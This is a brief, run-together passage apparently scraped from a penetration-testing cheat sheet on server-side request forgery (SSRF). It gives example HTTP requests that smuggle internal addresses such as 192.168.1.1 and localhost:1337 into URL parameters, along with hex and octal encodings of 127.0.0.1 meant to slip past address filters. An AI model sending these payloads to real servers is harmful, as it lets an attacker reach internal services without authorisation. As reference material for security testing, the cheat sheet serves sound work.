SSRF
POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com
urlApi=http://192.168.1.1%2fapi%2f&id=1GET /image?url=http://192.168.1.1/
Host: example.comHow to exploit
http://127.0.0.1:1337
http://localhost:1337http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1http://127.0.0.1 -> http://0177.0.0.01How to exploit (URI Scheme)
Last updated